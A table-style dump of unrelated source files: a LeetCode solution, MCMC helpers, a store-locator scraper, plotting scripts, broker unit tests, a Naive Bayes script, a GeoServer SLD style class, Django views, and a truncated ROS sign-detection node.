index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,900 | 6a45e98c33aa499319a06e5d4a6af2aad2e9f5d4 | """
476. Number Complement
Difficulty: Easy
Related Topic: Bit Manipulate, XOR
Given a positive integer, output its complement number. The complement strategy is to flip the bits of its binary representation.
Note:
The given integer is guaranteed to fit within the range of a 32-bit signed integer.
You could assume no leading zero bit in the integer’s binary representation.
Example 1:
Input: 5
Output: 2
Explanation: The binary representation of 5 is 101 (no leading zero bits), and its complement is 010. So you need to output 2.
Example 2:
Input: 1
Output: 0
Explanation: The binary representation of 1 is 1 (no leading zero bits), and its complement is 0. So you need to output 0.
"""
class Solution(object):
def findComplement(self, num):
"""
:type num: int
:rtype: int
"""
digit = len("{0:b}".format(num))
max_num = pow(2, digit)-1
return num ^ max_num
num = 5
solution = Solution()
output = solution.findComplement(num)
print(output)
|
15,901 | 9fb7eda46e731951d9bd7d59b886815ec599e539 | import numpy as np
import emcee
import scipy.optimize as op
import matplotlib.pyplot as plt
import corner
import os
import scipy.stats as sstats
# local imports
import beer
def lnlike(theta, model, x, y, yerr):
""" The log likelihood function.
"""
return -np.nansum(0.5 * np.log([2 * np.pi] * len(y)))\
-np.nansum(np.log(yerr))\
-0.5*np.nansum(((y-model(x, *theta))/yerr)**2)
def lnprior(theta, priors):
""" Set prior boundaries.
"""
nparam = len(theta)
pass_count = 0
for i in range(nparam):
if priors[i][0] < theta[i] < priors[i][1]:
pass_count += 1
if pass_count == nparam:
return 0.0
else:
return -np.inf
def lnprob(theta, model, priors, x, y, yerr):
""" Returns the log likelihood function if the walker stays within
the priors.
"""
lp = lnprior(theta, priors)
if not np.isfinite(lp):
return -np.inf
return lp + lnlike(theta, model, x, y, yerr)
def get_theta(guess_list, *args):
""" Returns the parameter space theta.
guess_list: list of initial parameter guesses
args: arguments from lnlike() (model, x, y, y_errs)
"""
nll = lambda *args : -lnlike(*args)
result = op.minimize(nll, guess_list, args=args)
theta = result["x"]
return theta
def get_samples(ID, params, pos, ndim, nwalkers, nsteps, theta, \
model, priors, x, y, yerr, convergenceplot_name=None, cornerplot_name=None):
""" Returns the samples from emcee.
"""
# pos = [np.array([theta[0] + 1e-4*np.random.randn(), theta[1] - 0.1 * np.random.randn()]) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, \
args=(model, priors, x, y, yerr))
sampler.run_mcmc(pos, nsteps)
# if you want to check your burn in:
if convergenceplot_name != None:
if ndim==1:
fig = plt.figure()
plt.plot(sampler.chain[:,:,0].T, color='black', alpha=0.1)
plt.ylabel(params[0])
plt.xlabel('steps')
else:
fig, axs = plt.subplots(ndim, 1, sharex=True)
for i in range(ndim):
axs[i].plot(sampler.chain[:,:,i].T, color='black', alpha=0.1)
axs[i].set_ylabel(params[i])
axs[ndim-1].set_xlabel('steps')
fig.set_size_inches(10, 10)
plt.savefig(os.getcwd() + '/targets/' + str(ID) + '/' + convergenceplot_name)
samples = sampler.chain[:, int(nsteps/2):, :].reshape((-1, ndim))
def plot_corn():
labels = params
quantiles=[0.16, 0.5, 0.84]
fig = corner.corner(samples, labels=labels, quantiles=quantiles, \
show_titles=True, title_kwargs={"fontsize": 12})
plt.savefig(os.getcwd() + '/targets/' + str(ID) + '/' + cornerplot_name)
if cornerplot_name != None:
plot_corn()
return samples
|
15,902 | 8237b4491eea11cc2c05647f0115f609d6ecdeb4 | import json
import re
import scrapy
from scrapy.http import JsonRequest
from locations.dict_parser import DictParser
from locations.hours import OpeningHours, day_range
from locations.spiders.vapestore_gb import clean_address
class FoodLionUSSpider(scrapy.Spider):
name = "foodlion_us"
item_attributes = {"brand": "Food Lion", "brand_wikidata": "Q1435950"}
allowed_domains = ["www.foodlion.com"]
start_urls = ["https://www.foodlion.com/stores/"]
requires_proxy = True
def start_requests(self):
for state in ["GA", "SC", "NC", "MD", "TN", "VA"]:
yield JsonRequest(url=f"https://www.foodlion.com/bin/foodlion/search/storelocator.json?state={state}")
@staticmethod
def parse_hours(hours: [str]) -> OpeningHours:
oh = OpeningHours()
for rule in hours:
if rule == "Open 24 Hours":
return "24/7"
if m := re.match(
r"(\w+)(?:-(\w+))?: (\d+:\d\d)\s*([ap]m)\s*-\s*(\d+:\d\d)\s*([ap]m)", rule.replace(".", "")
):
start_day, end_day, start_time, start_zone, end_time, end_zone = m.groups()
if not end_day:
end_day = start_day
oh.add_days_range(
day_range(start_day, end_day),
f"{start_time} {start_zone}",
f"{end_time} {end_zone}",
time_format="%I:%M %p",
)
return oh
def parse(self, response, **kwargs):
for store in json.loads(response.json()["result"]):
store["street_address"] = clean_address(store.pop("address"))
item = DictParser.parse(store)
item["website"] = f'https://www.foodlion.com{ store["href"]}'
item["opening_hours"] = self.parse_hours(store["hours"])
yield item
|
15,903 | 721f0fdf53d7bdf7fafefe343ee456598cd0e78c | from pylab import *
import seaborn as sns
import json
# load data
migrationEffect1 = {}
migrationEffect2 = {}
# f = open("migrationEffect","r")
# migrationEffect1 = json.loads(f.read())
# f.close()
f = open("migrationEffect4","r")
migrationEffect2 = json.loads(f.read())
f.close()
# show data
# sns.set_palette("Paired",2)
figure(1)
title(u"small file do not know whether migration")
# colors = sns.color_palette('Paired',2)
colors = ["yellow","blue"]
keys = ["beforeMigration","afterMigration"]
for key in keys:
data = migrationEffect2[key]
beginTime = data["bt"]
timeSequence = data["ts"]
print len(timeSequence)
figx = []
figy = []
foret = beginTime
for i in xrange(len(timeSequence)):
v = timeSequence[i] - foret
figx.append(i+len(timeSequence)*keys.index(key))
figy.append(v)
foret = timeSequence[i]
# if key == "beforeMigration":
# bar(figx,figy,1,color=colors[keys.index(key)],label=key)
# else:
plot(figx,figy,color=colors[keys.index(key)],label=key)
# draw x y axis
# ticks_pos_x = []
# for i in xrange(10):
# ticks_pos_x.append(i*100)
# xticks(ticks_pos_x,ticks_pos_x)
xlabel("times")
# ticks_y = range(10)
# ticks_pos_y = range(10)
# yticks(ticks_pos_y,ticks_y)
ylabel("latency")
legend(loc='upper right')
# figure(2)
# title(u"3vs3, 4 process, Without data security")
# t = [u" Initial write ",u" Rewrite ",u" Read ",u" Re-read ",u" Random read ",u" Random write ",]
# for x in xrange(len(t)):
# k = t[x]
# figx = []
# figy = []
# for i in xrange(len(blockSize)):
# v = results[blockSize[i]][k]
# figx.append(i*8)
# if v != None:
# figy.append(v)
# else:
# figy.append(0)
# plot(figx,figy,label=t[x])
# # draw x y axis
# ticks_pos_x = []
# for i in range(len(blockSize)):
# ticks_pos_x.append(i*8)
# xticks(ticks_pos_x,blockSize)
# xlabel("Block Size")
# # ticks_y = ["100M","200M","300M","400M","500M","600M","700M","800M","900M","1G"]
# ticks_y = ["1GB","2GB","3GB"]
# gb =1048576 #KB
# ticks_pos_y = [1*gb,2*gb,3*gb]
# yticks(ticks_pos_y,ticks_y)
# ylabel("Throughput")
# legend(loc='upper left')
show()
|
15,904 | 149f44bae19ba03471c2fbacc392ae1434637b5a | #!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2015-2016,2018 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the search service command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
class TestSearchService(TestBrokerCommand):
def test_100_search_by_server(self):
command = ["search_service", "--server_hostname", "unittest00.one-nyp.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "utsvc/utsi2", command)
self.matchclean(out, "utsvc/utsi1", command)
self.matchclean(out, "afs", command)
def test_110_search_by_client(self):
command = ["search_service", "--client_hostname", "unittest00.one-nyp.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "afs/q.ny.ms.com", command)
self.matchoutput(out, "bootserver/unittest", command)
self.matchoutput(out, "dns/unittest", command)
self.matchoutput(out, "ntp/pa.ny.na", command)
self.matchoutput(out, "support-group/ec-service", command)
self.matchclean(out, "bootserver/one-nyp", command)
self.matchclean(out, "dns/one-nyp", command)
def test_120_has_clients(self):
command = ["search_service", "--has_clients"]
out = self.commandtest(command)
self.matchoutput(out, "afs/afs-by-net", command)
self.matchoutput(out, "afs/q.ny.ms.com", command)
self.matchoutput(out, "aqd/ny-prod", command)
self.matchoutput(out, "bootserver/one-nyp", command)
self.matchoutput(out, "bootserver/unittest", command)
self.matchoutput(out, "dns/one-nyp", command)
self.matchoutput(out, "dns/unittest", command)
self.matchoutput(out, "esx_management_server/ut.a", command)
self.matchoutput(out, "esx_management_server/ut.b", command)
self.matchoutput(out, "ntp/pa.ny.na", command)
self.matchoutput(out, "scope_test/target-personality", command)
self.matchoutput(out, "support-group/ec-service", command)
self.matchoutput(out, "syslogng/ny-prod", command)
self.matchoutput(out, "utsvc/utsi1", command)
self.matchoutput(out, "utsvc/utsi2", command)
self.matchoutput(out, "vmseasoning/pepper", command)
self.matchoutput(out, "vmseasoning/salt", command)
self.matchclean(out, "afs/q.ln.ms.com", command)
self.matchclean(out, "scope_test/scope-building", command)
self.matchclean(out, "poll_helper/unittest", command)
self.matchclean(out, "unmapped/instance1", command)
self.matchclean(out, "utnotify/localhost", command)
self.matchclean(out, "vcenter/ut", command)
def test_130_no_clients(self):
command = ["search_service", "--no_clients"]
out = self.commandtest(command)
self.matchoutput(out, "afs/q.ln.ms.com", command)
self.matchoutput(out, "camelcase/camelcase", command)
self.matchoutput(out, "scope_test/scope-building", command)
self.matchoutput(out, "poll_helper/unittest", command)
self.matchoutput(out, "unmapped/instance1", command)
self.matchoutput(out, "utnotify/localhost", command)
self.matchoutput(out, "vcenter/ut", command)
self.matchclean(out, "afs/ny-prod", command)
self.matchclean(out, "bootserver/one-nyp", command)
self.matchclean(out, "bootserver/unittest", command)
def test_140_server_location(self):
command = ["search_service", "--server_building", "ut"]
out = self.commandtest(command)
self.matchoutput(out, "bootserver/unittest", command)
self.matchoutput(out, "chooser1/ut.a", command)
self.matchoutput(out, "chooser1/ut.b", command)
self.matchoutput(out, "chooser1/ut.c", command)
self.matchoutput(out, "chooser2/ut.a", command)
self.matchoutput(out, "chooser2/ut.c", command)
self.matchoutput(out, "chooser3/ut.a", command)
self.matchoutput(out, "chooser3/ut.b", command)
self.matchoutput(out, "dns/unittest", command)
self.matchoutput(out, "utnotify/localhost", command)
self.matchoutput(out, "utsvc/utsi1", command)
self.matchoutput(out, "utsvc/utsi2", command)
self.matchclean(out, "bootserver/one-nyp", command)
self.matchclean(out, "dns/one-nyp", command)
self.matchoutput(out, "test_network_dev/test", command)
def test_141_server_location_exact_location(self):
command = ["search_service",
"--server_building", "ut",
"--server_exact_location"]
out = self.commandtest(command)
self.matchclean(out, "bootserver/unittest", command)
self.matchclean(out, "chooser1/ut.a", command)
self.matchclean(out, "chooser1/ut.b", command)
self.matchclean(out, "chooser1/ut.c", command)
self.matchclean(out, "chooser2/ut.a", command)
self.matchclean(out, "chooser2/ut.c", command)
self.matchclean(out, "chooser3/ut.a", command)
self.matchclean(out, "chooser3/ut.b", command)
self.matchclean(out, "dns/unittest", command)
self.matchclean(out, "utnotify/localhost", command)
self.matchclean(out, "utsvc/utsi1", command)
self.matchclean(out, "utsvc/utsi2", command)
self.matchclean(out, "bootserver/one-nyp", command)
self.matchclean(out, "dns/one-nyp", command)
self.matchoutput(out, "test_network_dev/test", command)
def test_150_client_location(self):
command = ["search_service", "--client_building", "np"]
out = self.commandtest(command)
self.matchoutput(out, "afs/q.ny.ms.com", command)
self.matchoutput(out, "aqd/ny-prod", command)
self.matchoutput(out, "bootserver/one-nyp", command)
self.matchoutput(out, "dns/one-nyp", command)
self.matchoutput(out, "ntp/pa.ny.na", command)
self.matchoutput(out, "support-group/ec-service", command)
self.matchoutput(out, "syslogng/ny-prod", command)
self.matchoutput(out, "utsvc/utsi1", command)
self.matchclean(out, "bootserver/unittest", command)
self.matchclean(out, "dns/unittest", command)
self.matchclean(out, "utsvc/utsi2", command)
self.matchclean(out, "vmseasoning", command)
self.matchclean(out, "esx_management_server", command)
def test_151_client_location_exact_location(self):
command = ["search_service",
"--client_building", "np",
"--client_exact_location"]
out = self.commandtest(command)
self.matchclean(out, "afs/q.ny.ms.com", command)
self.matchclean(out, "aqd/ny-prod", command)
self.matchclean(out, "bootserver/one-nyp", command)
self.matchclean(out, "dns/one-nyp", command)
self.matchclean(out, "ntp/pa.ny.na", command)
self.matchclean(out, "support-group/ec-service", command)
self.matchclean(out, "syslogng/ny-prod", command)
self.matchclean(out, "utsvc/utsi1", command)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestSearchService)
unittest.TextTestRunner(verbosity=2).run(suite)
|
15,905 | b38634efc4da8049953a8110b954afd3516f67ef | #bernouli multinomial ou gaussiana
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.neighbors import KNeighborsClassifier
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import cross_val_score
from sklearn.metrics import roc_curve, auc
from sklearn.naive_bayes import GaussianNB, MultinomialNB, ComplementNB, BernoulliNB
from imblearn.over_sampling import ADASYN, RandomOverSampler, SMOTE
from sklearn.model_selection import KFold
import sys
from funcs_aps import k_fold_eval
np.set_printoptions(threshold=np.nan)
#df_train = pd.read_csv('prpr_data/df_train_mean.csv')
#df_test = pd.read_csv('prpr_data/df_test_mean.csv')
df_train = pd.read_csv('prpr_data/df_badrm_train.csv')
df_test = pd.read_csv('prpr_data/df_badrm_test.csv')
# df_train = df_train.drop(columns=['cd_000'])
# df_test = df_test.drop(columns=['cd_000'])
# col = [17, 63, 68, 83, 95]
# col = [elem+15 for elem in col]
# print(col)
# X_train_imb = df_train.iloc[:, col].values
X_train_imb = df_train.iloc[:, 1:].values
y_train_imb = df_train.iloc[:, 0].values
X_test = df_test.iloc[:, 1:].values
y_test = df_test.iloc[:, 0].values
over_smote = SMOTE(random_state=57, ratio='auto')
X_train_bal, y_train_bal = over_smote.fit_sample(X_train_imb, y_train_imb)
p = np.random.permutation(len(y_train_bal))
X_train_bal = X_train_bal[p]
y_train_bal = y_train_bal[p]
# dont forget to scale data for naive bayes:
min_max_scaler = preprocessing.MinMaxScaler()
min_max_scaler.fit(X_train_bal)
X_train_bal = min_max_scaler.transform(X_train_bal)
#X_test = min_max_scaler.transform(X_test)
#sys.stdout = open('NBayes_cv.txt', 'a')
## NAIVE BAYES
#classf = GaussianNB()
classf = MultinomialNB()
#classf = ComplementNB()
# classf = BernoulliNB()
print("\n \n")
print(classf)
#classf.fit(X_train_bal, y_train_bal)
k_fold_eval(classf, X_train_bal, y_train_bal)
# # for test set
# print('\n \n test set \n')
# y_pred_test = classf.predict(X_test)
# y_true_test = y_test
#
#
# print("Accuracy on test set: " + str(accuracy_score(y_true_test, y_pred_test)))
#
# cm_test = confusion_matrix(y_true_test, y_pred_test)
# print("Confusion matrix Test set")
# print(cm_test)
#
# TPrate = cm_test[1,1]/(cm_test[1,1]+cm_test[1,0]) # TPrate= TP/(TP+FN)
# print("TPrate NB (test) = " + str(TPrate))
# specif = cm_test[0,0]/(cm_test[0,0]+cm_test[0,1]) # specificity = TN/(TN+FP)
# print("specificity NB (test) = " + str(specif))
# cost = cm_test[0,1]*10 + cm_test[1,0]*500
# print("cost (test) = " + str(cost))
#
# # Compute ROC curve and ROC area for each class
# y_score_test = classf.predict_proba(X_test)
# y_score_test = np.array(y_score_test)[:,1]
# fpr_nb_test, tpr_nb_test, _ = roc_curve(y_true_test, y_score_test)
# roc_auc_nb_test = auc(fpr_nb_test, tpr_nb_test)
# print("auc (test) = " + str(roc_auc_nb_test))
|
15,906 | 9f6bf5d8ca38ad4d83127931504ea37b63574055 |
import os
import sys
import glob
import json
import numpy
import pandas
import datetime
import subprocess
import matplotlib
from matplotlib import pyplot
import covid_utils as utils
def main():
### plot summary of data for USA
choice_run_us_summary = input('\nPlot data summary for USA? [y/N] ')
if choice_run_us_summary.lower() in ['yes', 'y']:
return plot_usa_summary()
### plot summary of data for state
choice_run_ma_summary = input('Plot data summary for Massachusetts? [y/N] ')
if choice_run_ma_summary.lower() in ['yes', 'y']:
return plot_state_summary('ma')
### plot example 1 of Benford breakdown
choice_run_benford_breakdown_1 = input('Plot example 1 Benford analysis? [y/N] ')
if choice_run_benford_breakdown_1.lower() in ['yes', 'y']:
df_us = utils.load_df_us()
return plot_benford_breakdown(df_us, column='positive', data_label='cumulative # cases', legend_title='Data for USA')
### plot example 2 of Benford breakdown
choice_run_benford_breakdown_2 = input('Plot example 2 Benford analysis? [y/N] ')
if choice_run_benford_breakdown_2.lower() in ['yes', 'y']:
df_ma = utils.load_df_state('ma')
return plot_benford_breakdown(df_ma, column='deathIncrease', data_label='# deaths per day', legend_title='Data for Massachusetts')
def plot_usa_summary(days_smooth=7):
'''
Generates a summary plot of positive cases and deaths for the USA
'''
df = utils.load_df_us()
fig, (ax1, ax2) = pyplot.subplots(ncols=2, figsize=(10.5, 5), sharex=True)
fig.subplots_adjust(left=0.08, top=0.91, right=0.98, bottom=0.15, wspace=0.2)
ax1.set_title('# New Cases per day in USA', size=16)
ax2.set_title('# Deaths per day in USA', size=16)
dt = pandas.Timedelta('%iD'%days_smooth)
ax1.plot(df['date']-dt/2., df['positiveIncrease'].rolling(days_smooth).mean(), lw=3, color='#135cd1')
ax2.plot(df['date']-dt/2., df['deathIncrease'].rolling(days_smooth).mean(), lw=3, color='#d40f0f')
ax1.grid(lw=1, color='gray', ls=':')
ax2.grid(lw=1, color='gray', ls=':')
### converting xlabel from date to month name
fig.canvas.draw()
x_dates = pandas.DatetimeIndex([x.get_text() for x in ax1.xaxis.get_ticklabels()])
x_months = [month[0:3] for month in x_dates.month_name()]
ax1.xaxis.set_ticklabels(x_months)
### formatting y-axis of new-cases plot
yticks = [ytick.get_text() for ytick in ax1.yaxis.get_ticklabels()]
yticks_new = [ytick[::-1].replace('000','k')[::-1] for ytick in yticks]
ax1.yaxis.set_ticklabels(yticks_new)
### references
ref = '$\it Data \; from \; the \; COVID \; Tracking \; Project$\n%s' % utils.URL_API
t = ax2.text(0.97, -0.09, ref, transform=ax2.transAxes, ha='right', va='top', size=10, color='#666666')
return fig
def plot_state_summary(state, days_smooth=7, format_yaxis=True):
'''
Generates a summary plot of positive cases and deaths for the given state
'''
df = utils.load_df_state(state)
fig, (ax1, ax2) = pyplot.subplots(ncols=2, figsize=(10.5, 5), sharex=True)
fig.subplots_adjust(left=0.08, top=0.91, right=0.98, bottom=0.15, wspace=0.2)
ax1.set_title('# New Cases per day in %s' % state.upper(), size=16)
ax2.set_title('# Deaths per day in %s' % state.upper(), size=16)
dt = pandas.Timedelta('%iD'%days_smooth)
ax1.plot(df['date']-dt/2., df['positiveIncrease'].rolling(days_smooth).mean(), lw=3, color='#135cd1')
ax2.plot(df['date']-dt/2., df['deathIncrease'].rolling(days_smooth).mean(), lw=3, color='#d40f0f')
ax1.grid(lw=1, color='gray', ls=':')
ax2.grid(lw=1, color='gray', ls=':')
### converting xlabel from date to month name
fig.canvas.draw()
x_dates = pandas.DatetimeIndex([x.get_text() for x in ax1.xaxis.get_ticklabels()])
x_months = [month[0:3] for month in x_dates.month_name()]
ax1.xaxis.set_ticklabels(x_months)
### formatting y-axis of new-cases plot
if format_yaxis == True:
yticks = [ytick.get_text() for ytick in ax1.yaxis.get_ticklabels()]
yticks_new = [ytick[::-1].replace('000','k')[::-1] for ytick in yticks]
ax1.yaxis.set_ticklabels(yticks_new)
### references
ref = '$\it Data \; from \; the \; COVID \; Tracking \; Project$\n%s' % utils.URL_API
t = ax2.text(0.97, -0.09, ref, transform=ax2.transAxes, ha='right', va='top', size=10, color='#666666')
return fig
def plot_benford_breakdown(df_input, column='positiveIncrease', data_label='# new cases per day', legend_title=''):
'''
Description
-----------
Generates a plot showing the fraction of entries of `column`
in `df_input` that begin with each leading digit of (1-9)
Parameters
----------
df_input : pandas.DataFrame
Dataframe containing the data (duh)
column : str
Name of column to analyze
'''
if column not in df_input.columns:
raise IOError('Column "%s" not found in input dataframe' % column)
### ignoring values of 0 and NaN
df_input = df_input.query('%s!=0' % column).dropna(subset=[column])
### extracting leading digits
leading_digits = df_input[column].apply(lambda val: int(str(val)[0])).values
### counting frequencies
counts = numpy.array([(leading_digits==i).sum() for i in range(1,10)])
### initializing figure
fig, ax = pyplot.subplots()
ax.set_xlabel('Leading Digit', size=14)
ax.set_ylabel('Fraction of total', size=14)
ax.grid(color='gray', lw=1, ls=':')
ax.errorbar(range(1,10), counts/counts.sum(), yerr=counts**0.5/counts.sum(), ls='-', marker='o', ms=9, color='g', mfc='none', mec='g', mew=2, ecolor='g', elinewidth=2, capsize=0, label=data_label)
ax.plot(range(1,10), utils.benford_probabilities(), ls='-', lw=3, dashes=[4,1], color='r', label="Benford's Law")
legend = ax.legend(loc='upper right', title=legend_title, fontsize=11)
pyplot.setp(legend.get_title(), fontsize=12)
return fig
if __name__ == '__main__':
main()
|
15,907 | c4d798ae99a2e628dfdf43388854fdb874ec8b47 | import random
from .postgres import Pg
from .classifiedStyle import ClassifiedStyle
from .rasterStyle import RasterStyle
from matplotlib.colors import rgb2hex
from .support import str_to_num
class StyleSld (ClassifiedStyle, RasterStyle, Pg):
"""
This is the main style class for generating the SLD files.
There are mainly 4 types of styles based on the data
1. SIMPLE : Valid for point, line, polygon features
2. CATEGORIZED : Valid for point, line, polygon features
3. CLASSIFIED : Valid for point, line, polygon features
4. RASTER : Valid for raster dataset
Simple Style:
=============
The simple style
Parameters:
-----------
attribute_name : str
Required: For CLASSIFIED and CATEGORIZED style / Not required for SIMPLE and RASTER style
Default Value: None
Description:
values: array
Required: For CLASSIFIED and CATEGORIZED style / Not required for SIMPLE and RASTER style
Default Value: None
Description:
number_of_class : int
Required: For CLASSIFIED style / Not required for SIMPLE, CATEGORIZED and RASTER style
Default Value: 5
Description: The number of classes for the CATEGORIZED style is equal to length of `values`
color_palette : str, list, dict
Required: For CATEGORIZED, CLASSIFIED AND RASTER style / Not required for SIMPLE style
Default Value: 'Spectral_r'
Description:
style_name : str
Required: Required
Default Value: 'style'
Description:
geom_type : str
Required: For CATEGORIZED, CLASSIFIED AND SIMPLE style / Not required for RASTER style
Default Value: 'polygon'
Available Values: 'point', 'line', 'polygon'
Description:
classification_method: str
Required: For CLASSIFIED style / Not required for CATEGORIZED, RASTER AND SIMPLE style
Default Value: 'natural_break'
Available Values: 'natural_break', 'equal_interval', 'quantile', 'standard_deviation', 'geometrical_interval'
fill_color: str, color_code
Required: For SIMPLE style
Default Value: '#ffffff'
stroke_color: str, color_code
Required: For SIMPLE, CATEGORIZED, AND CLASSIFIED style
Default Value: '#333333'
stroke_width: numeric
Required: For SIMPLE, CATEGORIZED, AND CLASSIFIED style
Default Value: 1
opacity: numeric, value between 0 and 1
Required: Required
Default Value: 1
dbname: str
Required: Optional
Default Value: None
user: str
password: str
host: str
schema: str
pg_table_name: str
point_size: int
well_known_name: str
point_roration: int
stroke_linecap: str
stroke_dasharray: str
perpendicular_offset: str
feature_label: bool
font_family: str
font_color: str, color_code
font_size: int
font_weight: str
font_style: str
halo_color: str, color_code
halo_radius: numeric
continuous_legend: bool
"""
def __init__(
self,
attribute_name=None,
values=None,
number_of_class=5,
color_palette="Spectral_r",
style_name='style',
geom_type='polygon',
classification_method='natural_break',
fill_color='#ffffff',
stroke_color="#333333",
stroke_width=1,
opacity=1,
dbname=None,
user='postgres',
password='admin',
host='localhost',
port='5432',
schema='public',
pg_table_name=None,
point_size=6,
well_known_name='circle',
point_rotation=0,
stroke_linecap='round',
stroke_dasharray=None,
perpendicular_offset=None,
feature_label=False,
font_family='Aerial',
font_color="#333333",
font_size=14,
font_weight='normal',
font_style="normal",
halo_color="#ffffff",
halo_radius=1,
continuous_legend=True,
):
Pg.__init__(self, dbname, user, password, host, port)
ClassifiedStyle.__init__(
self,
attribute_name=attribute_name,
values=values,
color_palette=color_palette,
number_of_class=number_of_class,
classification_method=classification_method,
style_name=style_name,
geom_type=geom_type,
fill_color=fill_color,
stroke_color=stroke_color,
stroke_width=stroke_width,
opacity=opacity,
point_size=point_size,
well_known_name=well_known_name,
point_rotation=point_rotation,
stroke_linecap=stroke_linecap,
stroke_dasharray=stroke_dasharray,
perpendicular_offset=perpendicular_offset,
feature_label=feature_label,
font_family=font_family,
font_color=font_color,
font_size=font_size,
font_weight=font_weight,
font_style=font_style,
halo_color=halo_color,
halo_radius=halo_radius
)
RasterStyle.__init__(
self,
style_name=style_name,
color_palette=color_palette,
number_of_class=number_of_class,
opacity=opacity,
continuous_legend=continuous_legend
)
# The schema of the table from postgresql
self.schema = schema
self.pg_table_name = pg_table_name
def connect_pg(self, dbname, user, password, host, port):
self.dbname = dbname
self.user = user
self.password = password
self.host = host
self.port = port
self.connect()
def get_attribute_name(self, pg_table_name=None):
'''
Help to connect with postgresql and set the attribute_name.
The attribute name will be the column_name of the shapefile attribute table.
'''
if self.conn is None:
self.connect()
if pg_table_name is not None:
self.pg_table_name = pg_table_name
if self.attribute_name is None:
# Function to get the column_names from postgres
columns = self.get_column_names(self.pg_table_name)
self.attribute_name = random.choice(columns)
return self.attribute_name
else:
return self.attribute_name
def get_values_from_pg(self):
"""
Get the values from postgresql and set it to self.values
Parameters used:
----------------
self.conn : connection class
It will be automatically connected if user provides the connection parameters
self.values : array
The values from specific column of postgres
self.attribute_name: str
The column name of the table
self.pg_table_name: str
self.schema: str
"""
if self.conn is None:
self.connect()
if self.attribute_name is None:
self.attribute_name = self.get_attribute_name()
self.values = self.get_values_from_column(
column=self.attribute_name, table=self.pg_table_name, schema=self.schema)
return self.values
def generate_simple_style(self):
return self.simple_style()
def generate_categorized_style(self):
if self.values is None:
self.get_values_from_pg()
return self.categorized_style()
def generate_classified_style(self):
if self.values is None:
self.get_values_from_pg()
return self.classified_style()
def generate_raster_style(self, max_value, min_value):
return self.coverage_style(max_value, min_value)
|
15,908 | 08d5e94e816b03456f48b074d7d1d162a6f6a68f | from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .models import Store, Client
from django.http import HttpResponseNotFound
from django.contrib.auth.models import User
from django.contrib import auth
# Create your views here.
def index(request):
return render(request,'index.html')
def main(request):
return render(request,'main.html')
def wait(request, store_id):
store_detail = get_object_or_404(Store, pk=store_id)
clients = Client.objects
clientph = Client.objects.values('phonenum')
aa=0
for i in clientph.values():
aa+=1
i
return render(request, 'wait.html', {'store': store_detail,'clients':clients,'num':i,'aa':aa,'clientph':clientph})
def store(request):
stores = Store.objects
store_list = Store.objects.all()
paginator = Paginator(store_list, 5)
page = request.GET.get('page')
try:
posts = paginator.page(page)
except PageNotAnInteger:
posts = paginator.page(1)
page = 1
except EmptyPage:
posts = paginator.page(paginator.num_pages)
return render(request, 'home.html', {'posts': posts, 'pages': range(1, paginator.num_pages+1), 'current': int(page), 'user': request.user })
def search(request):
if request.method == 'POST':
storeList = Store.objects.filter(body__icontains=request.POST['search'])
print(storeList)
return render(request,'search.html',{'posts':storeList,'user':request.user })
else:
return HttpResponseNotFound("없는 페이지 입니다.")
def phone(request):
return render(request, 'phone.html')
def clientnew(request):
client = Client()
client.phonenum = request.POST['phonenum']
client.save()
return redirect('/store')
def signup(request):
if request.method == 'POST':
if request.POST['password1'] == request.POST['password2']:
user = User.objects.create_user(
request.POST['username'], password=request.POST['password1'])
auth.login(request, user)
return redirect('store')
return render(request, 'accounts/signup.html')
def login(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = auth.authenticate(request, username=username, password=password)
if user is not None:
auth.login(request, user)
return redirect('store')
else:
return render(request, 'accounts/login.html', {'error': 'username or password is incorrect.'})
else:
return render(request, 'accounts/login.html')
def logout(request):
if request.method == 'POST':
auth.logout(request)
return redirect('store')
return render(request, 'accounts/signup.html')
def new(request):
return render(request, 'new.html')
def create(request):
sto = Store()
sto.title = request.GET['storename']
sto.body = request.GET['location']
sto.time = request.GET['cookingtime']
sto.author = request.user
sto.pup_date = timezone.datetime.now()
sto.save()
return redirect('/store/')
|
15,909 | 074f440002fbb57996f95c719b48c027f107b272 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import numpy as np
import cv2
from cv_bridge import CvBridge
from sensor_msgs.msg import Image, CompressedImage
class DetectSign():
def __init__(self):
# parameter for communication
# rospy.set_param('/tb2/mission_start', False)
# rospy.set_param('/tb3/mission_start', False)
# color parameter
self.hue_red_l = rospy.get_param("~detect/lane/red/hue_l", 0)
self.hue_red_h = rospy.get_param("~detect/lane/red/hue_h", 9)
self.saturation_red_l = rospy.get_param("~detect/lane/red/saturation_l", 255)
self.saturation_red_h = rospy.get_param("~detect/lane/red/saturation_h", 255)
self.lightness_red_l = rospy.get_param("~detect/lane/red/lightness_l", 179)
self.lightness_red_h = rospy.get_param("~detect/lane/red/lightness_h", 255)
self.hue_green_l = rospy.get_param("~detect/lane/green/hue_l", 38)
self.hue_green_h = rospy.get_param("~detect/lane/green/hue_h", 72)
self.saturation_green_l = rospy.get_param("~detect/lane/green/saturation_l", 200)
self.saturation_green_h = rospy.get_param("~detect/lane/green/saturation_h", 255)
self.lightness_green_l = rospy.get_param("~detect/lane/green/lightness_l", 34)
